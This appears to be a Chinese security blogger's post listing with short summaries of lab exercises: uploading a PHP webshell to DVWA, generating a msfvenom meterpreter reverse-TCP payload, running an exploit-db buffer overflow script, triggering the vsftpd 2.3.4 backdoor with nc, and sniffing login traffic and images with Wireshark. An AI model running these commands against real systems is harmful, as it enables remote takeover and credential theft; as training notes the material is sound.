- 博客(10)
- 收藏
- 关注
RSS订阅原创 一句话木马+蚁剑连接(以DVWA网站为例)
1、打开kali和靶机,在kali里面打开火狐,在地址栏输入http://靶机IP/dvwa,打开DVWA,登进去把安全等级设为low。2、将一句话木马指令<?>写入shell.php中。5、打开蚁剑,右键选择添加数据,填好配置数据后点左上角的添加。4、验证看木马是不是成功了,如果搜索没有显示错误就是成功了。6、双击这条数据就可以看到DVWA里面的文件了。准备:kali matesploit 蚁剑。3、将脚本在网站里面上传。
2025-12-29 20:11:53
142
原创 反向TCP远程操控
在 Kali 终端中执行以下命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=[kali的IP] lport=5000 -f exe -o /root/payload.exe,生成 Windows 可执行的 payload 文件。工具:Metasploit Framework、U盘(用于传输 payload)在Windows上运行下载好的payload,建立会话,出现如下标志即为监听成功。攻击机:Kali(以下使用example代替kali的ip)
2025-12-27 01:10:47
199
原创 Easy File Sharing Web Server 缓冲区溢出漏洞测试-远程控制
漏洞脚本执行:python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.243.1 8000。查看Windows底部的任务栏,发现Easy File Sharing Web Server进程消失,弹出计算器窗口,说明缓冲区溢出成功执行任意代码。安装好Easy File Sharing Web Server ,将服务端口修改为8000并启动。在kali里面的searchsploit查询Easy File Sharing的漏洞。
2025-12-27 00:19:46
158
原创 漏洞扫描-笑脸漏洞
(4)手动模拟FTP登录,用nc 靶机IP 21这个指令,回车后输入用户名,再回车后输入密码,然后就可以ctrl+c退出当前nc连接,需要注意的是,用户名一定要带有“:)”,这个是触发笑脸漏洞的关键,密码任意。3、针对VSFTPD v2.3.4的脚本检测,输入nmap --script ftp-vsftpd-backdoor 192.168.243.129。(2)在kali终端输入ip a,得到本机IP,接着再用nmap ip/24指令来获取靶机的IP。2、瑞士军刀实践演示。
2025-12-23 00:20:59
255
原创 等保2.0的核心要点
网络安全等级保护 2.0(简称)是我国网络安全领域的核心标准体系,由《网络安全等级保护条例》及配套国标(GB/T 22239-2019)规范,2019 年正式实施,替代了 2007 年的等保 1.0 标准,覆盖范围和防护要求全面升级。
2025-12-09 00:01:40
516
原创 TCP的53端口与UDP的53端口有何不同?
TCP 53 和 UDP 53 端口均为,二者的差异源于底层传输协议特性,直接决定了它们在 DNS 服务中的分工场景。
2025-12-08 13:40:48
431
原创 主动扫描实验复现
同一网段里有多台主机IP存在,“/24”是CIDR网段表示法(用来扫描该IP所在的整个子网),一台是Windows服务器,一台是DNS服务器,将第三台的IP地址复制进浏览器,搜索找到靶机。(2)443/tcp:HTTPS端口,提供加密的超文本传输协议服务,是现在主流的安全网页访问端口。(1)80/tcp:HTTP端口,提供超文本传输协议服务,是访问普通明文网页的默认端口。intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽。web应用程序的目录信息、源码信息、漏洞信息。
2025-12-08 13:32:45
262
原创 用ZoomEye搜索引擎收集子域名
2、在搜索框输入目标主域名,输入格式为:domain=“目标域名”,搜索后会弹出该主域名下的所有子域名。1、打开ZoomEye(钟馗之眼)搜索引擎。其它搜索引擎还有Shodan。
2025-12-01 23:59:54
201
原创 用Wireshark抓包QQ图片
8、最后在文件中找到刚刚最后保存的xxx.jpg,如果可以呈现出原图即为捕获成功,如果不成功的话,可以返回最开始保存的文件,在010Editor查找FF D9,把这个后面的都删了,然后再保存,再尝试打开。3、接着打开手机WiFi,找到手机的IP地址,返回wireshark,在搜索栏里面输入以下指令,等号后面就是我们找到的手机IP地址。1、首先确保手机和电脑连接的是同一个网络,然后打开Wireshark,电脑是什么连接方式就选什么进行捕获,我这里选的是WALN。6、显示为要选择原始数据,接着另存。
2025-11-18 12:27:07
176
原创 用Wireshark捕获登录信息(以百色生活网为例)
(1)打开Wireshark,选择连接方式进行捕获(电脑网络是什么类型就选择什么连接方式捕获,这里我选的是WLAN)(2)双击连接方式进行捕获,同时在浏览器打开需要捕获的网站。(选取百色生活网为例子)然后随便输入一个账号和密码,点击登录(3)返回Wirshark,在Wirshark捕获到相关网站的流量之后停止捕获打开电脑终端,输入以下命令行即可获取百色生活网的IP地址了可以看到图片中得出的120.78.161.67就是我们想要的地址。
2025-11-17 09:54:06
183
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人